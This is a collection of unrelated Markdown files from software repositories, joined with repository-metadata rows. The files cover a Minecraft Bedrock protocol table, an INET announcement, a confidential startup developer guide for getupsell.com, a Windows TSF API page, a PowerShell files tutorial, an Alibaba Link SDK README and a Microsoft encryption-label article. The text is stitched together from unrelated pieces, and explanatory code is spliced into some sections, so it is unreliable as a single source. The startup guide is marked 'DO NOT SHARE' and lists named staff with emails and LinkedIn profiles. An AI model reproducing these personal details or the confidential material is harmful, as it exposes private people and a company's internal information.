---
layout: default
---
# Inventory action
## Fields
Name | Type | When | Default
---|---|:---:|:---:
[source](#source) | varuint | |
container | varint | <code>source</code> is equal to <code>0</code> | -1
? | varuint | <code>source</code> is equal to <code>2</code> |
slot | varuint | |
old item | [slot](/protocol/bedrock201/types/slot) | |
new item | [slot](/protocol/bedrock201/types/slot) | |
### source
**Constants**:
Name | Value
---|:---:
container | 0
world | 2
creative | 3
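The `varuint` and `varint` wire types in the tables above are, in Bedrock-style protocols, commonly encoded as LEB128 (with ZigZag pre-encoding for signed `varint`). As an illustration only — these helper functions are an assumption about the wire format, not part of this protocol documentation — a minimal Python sketch:

```python
def encode_varuint(value: int) -> bytes:
    """Encode an unsigned integer as LEB128: 7 data bits per byte, MSB set on continuation bytes."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)  # more bytes follow
        else:
            out.append(byte)
            return bytes(out)

def encode_varint(value: int) -> bytes:
    """Encode a signed integer: ZigZag-map it to unsigned, then LEB128-encode."""
    return encode_varuint((value << 1) ^ (value >> 63))

# Example: a 'container' action (source == 0) with the default container id -1.
print(encode_varuint(0).hex())   # source: container -> 00
print(encode_varint(-1).hex())   # container id -1   -> 01
```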
---
layout: post
title: IPv4 Network Configurator Tutorial Released
category: news
---
How to configure IPv4 addresses and routing tables in an INET simulation
is a recurring question on the mailing list. It is not always trivial
how to use INET's network configurator for various types of networks,
and how to incorporate special requirements. Therefore, we are particularly happy
to report that we have completed the writing of the
*IPv4 Network Configurator Tutorial*, and it has been made available
on the INET site. We hope that the tutorial will be useful, and help
users get the most out of INET.
If you spot errors in the tutorial or have other feedback, you can
enter your comments by following the "Discussion" links found in the
tutorial pages themselves. If you wish to contribute, you can do so
by submitting pull requests against the `inet-tutorials` repository.
Links:
* [IPv4 Network Configurator Tutorial](https://inet.omnetpp.org/docs/tutorials/configurator/doc/)
# DO NOT SHARE NOTICE:
> This is a **living developer guide** that will undergo multitudinous modifications/adjustments as development progresses. All commits/pushes/modifications are recognized by the contributing author and attributed as applicable. Since this software **IS PROPRIETARY**, this document will **NOT BE SHARED** unless authorization is warranted from Brantley Pace (CEO) and/or JJ McMillen (Creative). **NO EXCEPTIONS** are authorized.
>
# Approved Editors:
* Brantley Pace, CEO
* JJ McMillen, Creative
* Charles Arcodia, CTO
* Sam Blount, AE
# Overview: Project getupsell.com
* Empower your revenue generating teams to become product experts with intuitive analytics insights, intelligently organized into tasks. Know your customers' needs before they do.
* Traditionally, Account Executives have very little visibility on how customers are using their products. Because of that, companies sell less than they could and customers are left with “just checking in emails.” Our mission is to help companies grow existing business by empowering their sales teams with product usage insights.
# Living Overview and Key Fundamentals (Google Doc Overview)
https://docs.google.com/document/d/1oZd0UF7xCtHNjL666cglS_HRMJAUVVgwSerWU5AkCls/edit
# Source/Version Control
* GitHub (Preferred)
# Website
* https://www.getupsell.com
# Accompanying links for development and references
* https://console.firebase.google.com/u/0/
* https://nodejs.org/en/
* https://code.visualstudio.com
* https://atom.io
* https://gdpr-info.eu
* https://firebase.google.com/docs/storage
# Primary Development Machine
* iMac Pro - Big Sur V 11.1
* Processor 3.2 GHz 8-Core Intel Xenon W
* Memory 32 GB 2666 MHz DDR4
* Graphics Radeon Pro Vega 56 8 GB
# Backend IDE/Syntax
* Visual Studio Code/Atom IDE's
* Node.JS - https://nodejs.org/en/
* JavaScript
* Firebase Database
* Firebase Storage
* Firebase HTTPS Cloud Functions
* Heroku - https://dashboard.heroku.com/apps
* Mongo Database - https://www.mongodb.com
# 3rd Party Frameworks (Subject to change as necessary)
* Express
* Morgan
* Firebase Storage
* Firebase Database
* Mongo DB (Database)
# GDPR (General Data Protection Regulation) and pertaining rules for development
> GDPR is responsible for data security and protecting end users. Since the penalties for non-conformity are high, please read through the guidelines @ https://gdpr-info.eu for further understanding. The General Data Protection Regulation (GDPR) is the toughest privacy and security law in the world. Though it was drafted and passed by the European Union (EU), it imposes obligations onto organizations anywhere, so long as they target or collect data related to people in the EU. The regulation was put into effect on May 25, 2018. The GDPR will levy harsh fines against those who violate its privacy and security standards, with penalties reaching into the tens of millions of euros.
> With the GDPR, Europe is signaling its firm stance on data privacy and security at a time when more people are entrusting their personal data with cloud services and breaches are a daily occurrence. The regulation itself is large, far-reaching, and fairly light on specifics, making GDPR compliance a daunting prospect, particularly for small and medium-sized enterprises (SMEs).
# Deebly Integration START (2 Signals)
**URL for Testing**
https://salty-savannah-91118.herokuapp.com
# Endpoint
/deebly_signals
# Complete URL
https://salty-savannah-91118.herokuapp.com/deebly_signals
# Headers
application/json Content-Type
application/json Accept
# HTTP Method
POST
# Deebly integration requires 3 keys to be integrated into the Deebly platform.
> First key (new_client_registration): Triggered when a new client registers for the Deebly platform.
> Second key (new_client_paid_plan): Triggered when a new client engages a paid plan.
> Third key (client_total_spend_increase): Triggered when a new client moves money to the Deebly platform.
> Every parameter is of type 'string', except for is_development_key, which is of type bool.
1. new_client_registration (Place API call into the function that registers new users into the Deebly platform)
**Required parameters:**
"admin_key" : "Grab this from the dashboard - endpoint /developer_keys under Keys/Development",
"is_development_key": Set this to true, as BETA will take place under development,
"type_of_key" : "new_client_registration",
"bdr_user_uid" : "This is the Business Development Reps unique UID stored in the Deebly Database - for example, Barry's UID",
"bdr_client_uid" : "This is the Business Development Reps client unique UID stored in the Deebly Database",
"bdr_client_email" : "This is the Business Development Reps client's email
2. new_client_paid_plan (Place API call into the function that registers the client for a paid service)
**Required parameters:**
"admin_key" : "Grab this from the dashboard - endpoint /developer_keys under Keys/Development",
"is_development_key": true,
"type_of_key" : "new_client_paid_plan",
"bdr_user_uid" : "This is the Business Development Reps unique UID stored in the Deebly Database - for example, Barry's UID",
"bdr_client_uid" : "This is the Business Development Reps client unique UID stored in the Deebly Database",
"bdr_client_email" : "This is the Business Development Reps client's email,
"type_of_paid_plan" : "The name of the registered plan the user signed up for"
3. client_total_spend_increase (Place API call into the function that moves money on behalf of the client)
**Required parameters:**
"admin_key" : "Grab this from the dashboard - endpoint /developer_keys under Keys/Development",
"is_development_key": true,
"type_of_key" : "client_total_spend_increase",
"bdr_user_uid" : "This is the Business Development Reps unique UID stored in the Deebly Database - for example, Barry's UID",
"bdr_client_uid" : "This is the Business Development Reps client unique UID stored in the Deebly Database",
"bdr_client_email" : "This is the Business Development Reps client's email,
"type_of_paid_plan" : "The name of the registered plan the user signed up for",
"client_total_spend" : "Place the monetary value that the client pays everytime a payment is made"
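The three signals share one endpoint and differ only in their payload. As a sketch of how one of these signals might be sent (the field names come from the parameter lists above; the helper functions, example values, and the use of Python's urllib are illustrative assumptions, not part of the Deebly platform):

```python
import json
import urllib.request

DEEBLY_URL = "https://salty-savannah-91118.herokuapp.com/deebly_signals"

def build_signal(type_of_key: str, admin_key: str, bdr_user_uid: str,
                 bdr_client_uid: str, bdr_client_email: str, **extra) -> dict:
    """Assemble the JSON body for one of the three Deebly signal keys."""
    payload = {
        "admin_key": admin_key,
        "is_development_key": True,  # BETA runs under development keys
        "type_of_key": type_of_key,
        "bdr_user_uid": bdr_user_uid,
        "bdr_client_uid": bdr_client_uid,
        "bdr_client_email": bdr_client_email,
    }
    payload.update(extra)  # e.g. type_of_paid_plan, client_total_spend
    return payload

def post_signal(payload: dict) -> bytes:
    """POST the payload with the documented Content-Type/Accept headers."""
    req = urllib.request.Request(
        DEEBLY_URL,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json", "Accept": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:  # network call; run only with a valid admin key
        return resp.read()

# Build (but do not send) a 'new_client_paid_plan' signal with placeholder values.
signal = build_signal("new_client_paid_plan", "ADMIN_KEY_FROM_DASHBOARD",
                      "barry-uid", "client-uid", "client@example.com",
                      type_of_paid_plan="pro")
print(sorted(signal))
```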
# Deebly Integration END (2 Signals)
# Product Integration
> With Upsell's API, users can manage tasks using simple HTTPS REST calls with preset parameters, depending on the needs of the organization, for global API access.
> For clarity, our REST API is designed and patterned using the HTTP protocol.
> For HTTP basic authentication and communication with the Upsell servers, users will provide bare-minimum credentials such as their Company Email along with their Phone number. From here, an account is created with the appropriate development/production keys to access our systems.
> From here, developers will implement HTTP calls to dev.getupsell.com along with the appropriate parameters. As an example, the average logo requires 5 keys (5 API calls) with an integration time of under 1 hour.
> After integration, the Admin can assign user credentials, rotate API keys, and conduct task management. The BDRs will follow their Upsell tasks accordingly and archive when necessary.
> Please refer to an example implementation of an HTTP call using Swift.
# iOS Swift Singleton Example
```swift
import Foundation

class Service: NSObject {

    static let shared = Service()

    func upsellPostRequest(admin_key: String, is_development_key: Bool, type_of_key: String, completion: @escaping ([String: Any]?, Error?) -> Void) {

        let parameters: [String: Any] = ["admin_key": admin_key, "is_development_key": is_development_key, "type_of_key": type_of_key]

        let slug = "targeted_request_key"
        let url = URL(string: "https://salty-savannah-91118.herokuapp.com/\(slug)")!
        let session = URLSession.shared
        var request = URLRequest(url: url)
        request.httpMethod = "POST"

        do {
            // pass dictionary to data object and set it as request body
            request.httpBody = try JSONSerialization.data(withJSONObject: parameters, options: .prettyPrinted)
        } catch let error {
            print(error.localizedDescription)
            completion(nil, error)
        }

        request.addValue("application/json", forHTTPHeaderField: "Content-Type")
        request.addValue("application/json", forHTTPHeaderField: "Accept")

        let task = session.dataTask(with: request, completionHandler: { data, response, error in

            guard error == nil else {
                completion(nil, error)
                return
            }

            guard let data = data else {
                completion(nil, NSError(domain: "dataNilError", code: -100001, userInfo: nil))
                return
            }

            do {
                guard let json = try JSONSerialization.jsonObject(with: data, options: .mutableContainers) as? [String: Any] else {
                    completion(nil, NSError(domain: "invalidJSONTypeError", code: -100009, userInfo: nil))
                    return
                }
                completion(json, nil)
            } catch let error {
                print(error.localizedDescription)
                completion(nil, error)
            }
        })

        task.resume()
    }
}
```
# Developer and Integration Guide (HTTPS and REST API for Logo Integration)
**URLS for Testing and Production**
* Development URL : https://dev.getupsell.com/
* Production URL : https://prod.getupsell.com/
**Endpoints:**
* /company_authentication
* /manage_users
**company_authentication**
*The first time a company/logo integrates getupsell with their current platform, company_authentication needs to be called with the following parameters:*
*String*
* type_of_request
* email
* password
* displayName
* sign_up_date
* user_uid
- type_of_request can either be: "registration" || "registration_database_update"
**registration**
* type_of_request
* email
* password
* displayName
**registration_database_update**
* type_of_request
* email
* sign_up_date
* user_uid
**manage_users**
* companyUID
* user_UID
* user_first_name
* user_last_name
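For a first-time integration, the two type_of_request values described above are typically sent in sequence: registration creates the account, and registration_database_update records the sign-up metadata. A hedged Python sketch of the two request bodies (the parameter names come from the lists above; the helper names and example values are illustrative, not part of the Upsell API):

```python
def registration_body(email: str, password: str, display_name: str) -> dict:
    """Body for type_of_request == 'registration'."""
    return {
        "type_of_request": "registration",
        "email": email,
        "password": password,
        "displayName": display_name,
    }

def registration_update_body(email: str, sign_up_date: str, user_uid: str) -> dict:
    """Body for type_of_request == 'registration_database_update'."""
    return {
        "type_of_request": "registration_database_update",
        "email": email,
        "sign_up_date": sign_up_date,
        "user_uid": user_uid,
    }

# These bodies would be POSTed to https://dev.getupsell.com/company_authentication
first = registration_body("dev@example.com", "s3cret", "Example Co")
second = registration_update_body("dev@example.com", "2021-05-10", "uid-123")
print(first["type_of_request"], second["type_of_request"])
```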
# How to get the Development and Production Keys
1. Make a company account @ app.getupsell.com
* Company Name
* Company Email
* Password
2. Hover over Developer Portal
* Select Developer Keys
* Make a secure copy of the Developer/Production Keys (60 character string)
# Developer Portal
* Dev and Prod Keys
* Access to development logs and permissions
* Correlated Tasks for the correct user
**STACK**
* Plain and vanilla HTML
* JavaScript
* Database connectivity - MongoDB and Firebase
# Developer Guide Creator and Licensing: Monday May 10th, 2021
**Project Manager/Salesforce Developer**
* Project Manager: Brantley Pace
* LinkedIn: https://www.linkedin.com/in/brantley-pace/
* Email: brantley@getupsell.com
* Education: MBA
**CREATIVE**
* Design/UI/UX: JJ McMillen
* Email: jennifer@getupsell.com
* LinkedIn: https://www.linkedin.com/in/jennifer-mcmillen/
* Education: Masters of Art, Design for Sustainability
**Chief Technology Officer**
* CTO/Developer: Charles Arcodia
* Email: charliearcodia@gmail.com
* LinkedIn: https://www.linkedin.com/in/charlie-arcodia-5b7898114/
* Education: MBA/CS
* Languages: C#, C++, JavaScript, Swift, Kotlin
**Account Executive**
* AE: Sam Blount
* Email: sam@getupsell.com
* LinkedIn: https://www.linkedin.com/in/samblount/
# Licensing for Source Control
* License: APACHE LICENSE, VERSION 2.0 (2004) - https://www.apache.org/licenses/LICENSE-2.0.html
| 38.451104 | 690 | 0.710231 | eng_Latn | 0.901096 |
edf1a1511cfd0211f3f7e0687afc9738508c5d10 | 2,609 | md | Markdown | desktop-src/TSF/isoftkbd-getsoftkeyboardtypemode.md | KrupalJoshi/win32 | f5099e1e3e455bb162771d80b0ba762ee5c974ec | [
"CC-BY-4.0",
"MIT"
] | null | null | null | desktop-src/TSF/isoftkbd-getsoftkeyboardtypemode.md | KrupalJoshi/win32 | f5099e1e3e455bb162771d80b0ba762ee5c974ec | [
"CC-BY-4.0",
"MIT"
] | null | null | null | desktop-src/TSF/isoftkbd-getsoftkeyboardtypemode.md | KrupalJoshi/win32 | f5099e1e3e455bb162771d80b0ba762ee5c974ec | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: ISoftKbd GetSoftKeyboardTypeMode method
description: The ISoftKbd GetSoftKeyboardTypeMode method retrieves the type mode for a soft keyboard.
ms.assetid: 77294652-b82e-4b69-bb55-5ebebc3c97c7
keywords:
- GetSoftKeyboardTypeMode method Text Services Framework
- GetSoftKeyboardTypeMode method Text Services Framework , ISoftKbd interface
- ISoftKbd interface Text Services Framework , GetSoftKeyboardTypeMode method
topic_type:
- apiref
api_name:
- ISoftKbd.GetSoftKeyboardTypeMode
api_location:
- Softkbd.dll
api_type:
- COM
ms.topic: reference
ms.date: 05/31/2018
---
# ISoftKbd::GetSoftKeyboardTypeMode method
The **ISoftKbd::GetSoftKeyboardTypeMode** method retrieves the type mode for a soft keyboard.
## Syntax
```C++
HRESULT GetSoftKeyboardTypeMode(
[out] TYPEMODE *lpTypeMode
);
```
## Parameters
<dl> <dt>
*lpTypeMode* \[out\]
</dt> <dd>
Pointer to a buffer in which this method retrieves the type mode. Possible values are defined for the [**TYPEMODE**](typemode.md) enumeration.
</dd> </dl>
## Return value
This method can return one of these values.
| Value | Description |
|----------------------------------------------------------------------------------------------|---------------------------------------------------|
| <dl> <dt>**S\_OK**</dt> </dl> | The method was successful.<br/> |
| <dl> <dt>**E\_INVALIDARG**</dt> </dl> | The *lpTypeMode* parameter is invalid.<br/> |
## Requirements
| Requirement | Value |
|-------------------------------------|----------------------------------------------------------------------------------------|
| Minimum supported client<br/> | Windows 2000 Professional \[desktop apps only\]<br/> |
| Minimum supported server<br/> | Windows 2000 Server \[desktop apps only\]<br/> |
| Redistributable<br/> | TSF 1.0 on Windows 2000 Professional<br/> |
| Header<br/> | <dl> <dt>Softkbdc.h</dt> </dl> |
| IDL<br/> | <dl> <dt>Softkbd.idl</dt> </dl> |
| DLL<br/> | <dl> <dt>Softkbd.dll</dt> </dl> |
## See also
<dl> <dt>
[**ISoftKbd**](isoftkbd.md)
</dt> <dt>
[**ISoftKbd::SetSoftKeyboardTypeMode**](isoftkbd-setsoftkeyboardtypemode.md)
</dt> <dt>
[**TYPEMODE**](typemode.md)
</dt> </dl>
---
title: "ファイルとフォルダーの操作"
ms.date: 2016-05-11
keywords: "PowerShell, コマンドレット"
description:
ms.topic: article
author: jpjofre
manager: dongill
ms.prod: powershell
ms.assetid: c0ceb96b-e708-45f3-803b-d1f61a48f4c1
translationtype: Human Translation
ms.sourcegitcommit: a656ec981dc03fd95c5e70e2d1a2c741ee1adc9b
ms.openlocfilehash: c3f7c226fcb496e5bb51ba601429c54b43de9d52
---
# Working with Files and Folders
Navigating through Windows PowerShell drives and manipulating the items on them is similar to manipulating files and folders on Windows physical disk drives. This section discusses how to deal with specific file and folder manipulation tasks.
### Listing All the Files and Folders Within a Folder
You can get all items directly within a folder by using **Get-ChildItem**. Add the optional **Force** parameter to display hidden or system items. For example, this command displays the direct contents of Windows PowerShell Drive C (which is the same as the Windows physical drive C):
```
Get-ChildItem -Force C:\
```
This command lists only the directly contained items, much like using Cmd.exe's **DIR** command or **ls** in a UNIX shell. To show contained items as well, you need to specify the **Recurse** parameter. (This can take a very long time to complete.) To list everything on the C drive, type:
```
Get-ChildItem -Force C:\ -Recurse
```
**Get-ChildItem** can filter items with its **Path**, **Filter**, **Include**, and **Exclude** parameters, but those are typically based only on name. You can perform complex filtering based on other properties of items by using **Where-Object**.
The following command finds all executables within the Program Files folder that were last modified after October 1, 2005, and that are no smaller than 1 megabyte and no larger than 10 megabytes:
```
Get-ChildItem -Path $env:ProgramFiles -Recurse -Include *.exe | Where-Object -FilterScript {($_.LastWriteTime -gt "2005-10-01") -and ($_.Length -ge 1m) -and ($_.Length -le 10m)}
```
### Copying Files and Folders
Copying is done with **Copy-Item**. The following command backs up C:\boot.ini to C:\boot.bak:
```
Copy-Item -Path c:\boot.ini -Destination c:\boot.bak
```
If the destination file already exists, the copy attempt fails. To overwrite a pre-existing destination, use the Force parameter:
```
Copy-Item -Path c:\boot.ini -Destination c:\boot.bak -Force
```
This command works even when the destination is read-only.
Folder copying works the same way. The following command copies the folder C:\temp\test1 to the new folder c:\temp\DeleteMe recursively:
```
Copy-Item C:\temp\test1 -Recurse c:\temp\DeleteMe
```
You can also copy a selection of items. The following command copies all .txt files contained anywhere in c:\data to c:\temp\text:
```
Copy-Item -Filter *.txt -Path c:\data -Recurse -Destination c:\temp\text
```
You can still use other tools to perform file system copies. XCOPY, ROBOCOPY, and COM objects such as **Scripting.FileSystemObject** all work in Windows PowerShell. For example, to use the Windows Script Host **Scripting.FileSystem COM** class to back up C:\boot.ini to C:\boot.bak, type:
```
(New-Object -ComObject Scripting.FileSystemObject).CopyFile("c:\boot.ini", "c:\boot.bak")
```
### Creating Files and Folders
Creating new items works the same way on all Windows PowerShell providers. If a Windows PowerShell provider has more than one type of item (for example, the FileSystem Windows PowerShell provider distinguishes between directories and files), you need to specify the item type.
The following command creates a new folder, C:\temp\New Folder:
```
New-Item -Path 'C:\temp\New Folder' -ItemType "directory"
```
The following command creates a new empty file, C:\temp\New Folder\file.txt:
```
New-Item -Path 'C:\temp\New Folder\file.txt' -ItemType "file"
```
### Removing All Files and Folders Within a Folder
You can remove contained items using **Remove-Item**, but you will be prompted to confirm the removal if the item contains anything else. For example, if you attempt to delete the folder C:\temp\DeleteMe, which contains other items, Windows PowerShell prompts you for confirmation before deleting the folder:
```
Remove-Item C:\temp\DeleteMe
Confirm
The item at C:\temp\DeleteMe has children and the -recurse parameter was not
specified. If you continue, all children will be removed with the item. Are you
sure you want to continue?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help
(default is "Y"):
```
If you do not want to be prompted for each contained item, specify the **Recurse** parameter:
```
Remove-Item C:\temp\DeleteMe -Recurse
```
### Mapping a Local Folder as a Windows Accessible Drive
You can also map a local folder using the **subst** command. The following command creates a local drive P: rooted in the local Program Files directory:
```
subst p: $env:programfiles
```
Just as with network drives, drives mapped within Windows PowerShell using **subst** are immediately visible to the Windows PowerShell shell.
### Reading a Text File into an Array
One of the more common storage formats for text data is a file in which separate lines are treated as distinct data elements. The **Get-Content** cmdlet can be used to read an entire file in one step, as shown here:
```
PS> Get-Content -Path C:\boot.ini
[boot loader]
timeout=5
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"
/noexecute=AlwaysOff /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=" Microsoft Windows XP Professional
with Data Execution Prevention" /noexecute=optin /fastdetect
```
**Get-Content** treats the data read from the file as an array, with one element per line of file content. You can confirm this by checking the **Length** of the returned content:
```
PS> (Get-Content -Path C:\boot.ini).Length
6
```
This command is most useful for getting lists of information into Windows PowerShell directly. For example, you might store a list of computer names or IP addresses in a file C:\temp\domainMembers.txt, with one name on each line of the file. To use **Get-Content** to retrieve the file contents and put them in the variable **$Computers**, type:
```
$Computers = Get-Content -Path C:\temp\DomainMembers.txt
```
**$Computers** is now an array containing one computer name in each element.
@page linksdk linksdk
[更正文档](https://gitee.com/alios-things/linksdk/edit/master/README.md)      [贡献说明](https://help.aliyun.com/document_detail/302301.html)
# 概述
Link SDK由阿里云提供给设备厂商,由设备厂商集成到设备上后通过该SDK将设备安全地接入到阿里云IoT物联网平台,继而让设备可以被阿里云IoT物联网平台进行管理。设备需要支持TCP/IP协议栈才能集成Link SDK。另外Zigbee、433、KNX这样的非IP设备需要通过网关设备接入到阿里云IoT物联网平台,网关设备需要集成Link SDK。
说明:Link SDK以前名称为Link Kit SDK,现更名为Link SDK。
该组件支持以下功能:
- MQTT连云
- HTTP连云
- 设备认证
- 物模型
- 时间同步
- RRPC
- 设备连接异常告警
- 日志上报
- 设备引导服务
- 子设备管理
- 设备诊断
- OTA(在AliOS THings场景建议使用OS自带OTA)
更多详情,请参考阿里云Link SDK[说明文档](https://help.aliyun.com/document_detail/163755.html?spm=a2c4g.11186623.6.558.38557748p9kUy6) 。
## License information
> Apache 2.0 License
## Directory structure
```tree
.
├── ChangeLog.md #change log
├── components
│   ├── bootstrap #device bootstrap service
│   ├── data-model #thing model
│   ├── devinfo #device information
│   ├── diag #device diagnostics
│   ├── dynreg #dynamic registration over HTTP
│   ├── dynreg-mqtt #dynamic registration over MQTT
│   ├── logpost #log upload
│   ├── ntp #NTP time
│   ├── ota #OTA feature
│   ├── shadow #device shadow
│   └── subdev #sub-devices
├── core
│   ├── aiot_http_api.c #HTTP core API implementation
│   ├── aiot_http_api.h #HTTP public header
│   ├── aiot_mqtt_api.c #MQTT core API implementation
│   ├── aiot_mqtt_api.h #MQTT public header
│   ├── aiot_state_api.c #status codes
│   ├── aiot_state_api.h #status code header
│   ├── aiot_sysdep_api.h #system-dependency header
│   ├── README.md
│   ├── sysdep #system-dependency implementations
│   └── utils #utility interfaces
├── external
│   ├── ali_ca_cert.c #CA certificate
│   └── README.md
├── package.yaml #build configuration
├── portfiles
│   ├── aiot_port #AliOS Things adaptation layer
│   └── README.md
└── README.md
```
## Dependencies
* osal_aos
* cjson
* mbedtls
# Common configuration
None
# API reference
See the Alibaba Cloud Link SDK [programming guide](https://help.aliyun.com/document_detail/163764.html?spm=a2c4g.11186623.6.568.3d00316fqDi9YJ).
# Usage examples
The following demos are provided under solutions for users to choose from:
- [link_sdk_demo: thing-model single-device example](https://g.alicdn.com/alios-things-3.3/doc/linksdk_demo.html)
- [link_sdk_gateway_demo: thing-model gateway proxying sub-devices to the cloud](https://g.alicdn.com/alios-things-3.3/doc/linksdk_gateway_demo.html)
## Adding the component
By default, only the thing model and gateway sub-device features are enabled. To build other features, include the corresponding header paths and source build paths in package.yaml. For example, to enable dynamic registration:
```yaml
source_file:
- "components/dynreg/*.c"
include:
- components/dynreg
```
# FAQ
For common questions, see the device access [FAQ](https://help.aliyun.com/document_detail/96598.html?spm=a2c4g.11186623.6.554.2042557fWpe2Ps) on the Alibaba Cloud website.
# CompuMaster.Web.TinyWebServerAdvanced
CompuMaster TinyWebServerAdvanced
* [BiometricPrompt](https://github.com/ZuoHailong/BiometricPrompt)
* [soter](https://github.com/Tencent/soter)
  A secure and quick biometric authentication standard and platform on Android, maintained by Tencent.
# APNS/2
- Forked from github.com/sideshow/apns2
- Adds a message body parameter `cmd`
- Modifies the `Badge` method
---
] | 3 | 2021-03-14T23:50:07.000Z | 2021-08-19T14:14:01.000Z | ---
title: Restrict access to content by using sensitivity labels to apply encryption
f1.keywords:
- NOCSH
ms.author: cabailey
author: cabailey
manager: laurawi
audience: Admin
ms.topic: article
ms.service: O365-seccomp
ms.localizationpriority: high
ms.collection:
- M365-security-compliance
search.appverid:
- MOE150
- MET150
description: Configure sensitivity labels for encryption that protects your data by restricting access and usage.
ms.custom: seo-marvel-apr2020
ms.openlocfilehash: 05e09bbd07bb8b4d15ce9bb82b64f49b49d88ffd
ms.sourcegitcommit: be095345257225394674698beb3feeb0696ec86d
ms.translationtype: HT
ms.contentlocale: nl-NL
ms.lasthandoff: 10/08/2021
ms.locfileid: "60239958"
---
# <a name="restrict-access-to-content-by-using-sensitivity-labels-to-apply-encryption"></a>Restrict access to content by using sensitivity labels to apply encryption
>*[Microsoft 365 licensing guidance for security & compliance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance/microsoft-365-security-compliance-licensing-guidance).*
When you create a sensitivity label, you can restrict access to content that the label will be applied to. For example, with the encryption settings for a sensitivity label, you can protect content so that:
- Only users within your organization can open a confidential document or email.
- Only users in the marketing department can edit and print the promotion announcement document or email, while all other users in your organization can only read it.
- Users cannot forward an email, or copy information from it, that contains news about an internal reorganization.
- The current price list that is sent to business partners cannot be opened after a specified date.
When a document or email is encrypted, access to the content is restricted, so that it:

- Can be decrypted only by users authorized by the label's encryption settings.
- Remains encrypted no matter where it resides, inside or outside your organization, even if the file is renamed.
- Is encrypted both at rest (for example, in a OneDrive account) and in transit (for example, email as it travels over the internet).
Finally, as an admin, when you configure a sensitivity label to apply encryption, you can choose either to:

- **Assign permissions now**, so that you determine exactly which users get which permissions to content with that label.
- **Let users assign permissions** when they apply the label to content. This way, you can allow people in your organization some flexibility that they might need to collaborate and get their work done.

The encryption settings are available when you [create a sensitivity label](create-sensitivity-labels.md) in the Microsoft 365 compliance center. You can also use the older portal, the Security & Compliance Center.
## <a name="understand-how-the-encryption-works"></a>Understand how the encryption works

Encryption uses the Azure Rights Management service (Azure RMS) from Azure Information Protection. This protection solution uses encryption, identity, and authorization policies. To learn more, see [What is Azure Rights Management?](/azure/information-protection/what-is-azure-rms) from the Azure Information Protection documentation.

When you use this encryption solution, the **super user** feature ensures that authorized people and services can always read and inspect the data that has been encrypted for your organization. If necessary, the encryption can then be removed or changed. For more information, see [Configuring super users for Azure Information Protection and discovery services or data recovery](/azure/information-protection/configure-super-users).
## <a name="important-prerequisites"></a>Important prerequisites

Before you can use encryption, you might need to do some configuration tasks. When you configure encryption settings, there's no check that these prerequisites are met.

- Activate protection from Azure Information Protection

  To apply encryption with sensitivity labels, the protection service (Azure Rights Management) from Azure Information Protection must be activated for your tenant. In newer tenants, this is the default setting, but you might need to activate the service manually. For more information, see [Activating the protection service from Azure Information Protection](/azure/information-protection/activate-service).

- Check for network requirements

  You might need to make some changes on your network devices, such as firewalls. For details, see [Firewalls and network infrastructure](/azure/information-protection/requirements#firewalls-and-network-infrastructure) from the Azure Information Protection documentation.

- Configure Exchange for Azure Information Protection

  Exchange doesn't have to be configured for Azure Information Protection before users can apply labels in Outlook to encrypt their emails. However, until Exchange is configured for Azure Information Protection, you don't get the full functionality of using Azure Rights Management protection with Exchange.

  For example, users can't view encrypted emails on mobile phones or with Outlook on the web, encrypted emails can't be indexed for search, and you can't configure Exchange Online DLP for Azure Rights Management protection.

  To make sure that Exchange can support these additional scenarios, see the following resources:

  - For Exchange Online, see the instructions for [Exchange Online: IRM Configuration](/azure/information-protection/configure-office365#exchangeonline-irm-configuration).
  - For Exchange on-premises, you must deploy the [RMS connector and configure your Exchange servers](/azure/information-protection/deploy-rms-connector).
## <a name="how-to-configure-a-label-for-encryption"></a>How to configure a label for encryption

1. Follow the general instructions to [create or edit a sensitivity label](create-sensitivity-labels.md#create-and-configure-sensitivity-labels) and make sure **Files & emails** is selected for the label's scope:

2. Then, on the **Choose protection settings for files and emails** page, select **Encrypt files and emails**.

3. On the **Encryption** page, select one of the following options:

   - **Remove encryption if the file is encrypted**: This option is supported only by the Azure Information Protection unified labeling client. When you select this option and use built-in labeling, the label might not display in apps, or it might display but without making any encryption changes.

     For more information about this scenario, see the [What happens to existing encryption when a label's applied](#what-happens-to-existing-encryption-when-a-labels-applied) section. It's important to understand that this setting can result in a sensitivity label that users might not be able to apply when they don't have sufficient permissions.

   - **Configure encryption settings**: Turns on encryption and makes the encryption settings visible:

For instructions for these settings, see the following section, [Configure encryption settings](#configure-encryption-settings).
### <a name="what-happens-to-existing-encryption-when-a-labels-applied"></a>What happens to existing encryption when a label's applied

When a sensitivity label is applied to unencrypted content, the outcome of the encryption options you can select is self-explanatory. For example, if you didn't select **Encrypt files and emails**, the content remains unencrypted.

However, the content might already be encrypted. For example, another user might have applied:

- Their own permissions, which include user-defined permissions when prompted by a label, custom permissions by the Azure Information Protection client, and **Restricted Access** document protection from an Office app.
- An Azure Rights Management protection template that encrypts the content independently from a label. This category includes mail flow rules that apply encryption by using rights protection.
- A label that applies encryption with permissions assigned by the administrator.

The following table identifies what happens to existing encryption when a sensitivity label is applied to that content:
| | Encryption: Not selected | Encryption: Configured | Encryption: Remove <sup>\*</sup> |
|:-----|:-----|:-----|:-----|
|**Permissions specified by a user**|Original encryption is preserved|New label encryption is applied|Original encryption is removed|
|**Protection template**|Original encryption is preserved|New label encryption is applied|Original encryption is removed|
|**Label with admin-defined permissions**|Original encryption is removed|New label encryption is applied|Original encryption is removed|
**Footnote:**

<sup>\*</sup> Supported by the Azure Information Protection unified labeling client.

In the cases where the new label encryption is applied or the original encryption is removed, this happens only if the user applying the label has a usage right or role that supports this action:

- The [usage right](/azure/information-protection/configure-usage-rights#usage-rights-and-descriptions) Export or Full Control.
- The role of [Rights Management issuer or Rights Management owner](/azure/information-protection/configure-usage-rights#rights-management-issuer-and-rights-management-owner), or [super user](/azure/information-protection/configure-super-users).

If the user doesn't have one of these rights or roles, the label can't be applied, and so the original encryption is preserved. The user sees the following message: **You don't have permission to make this change to the sensitivity label. Please contact the content owner.**

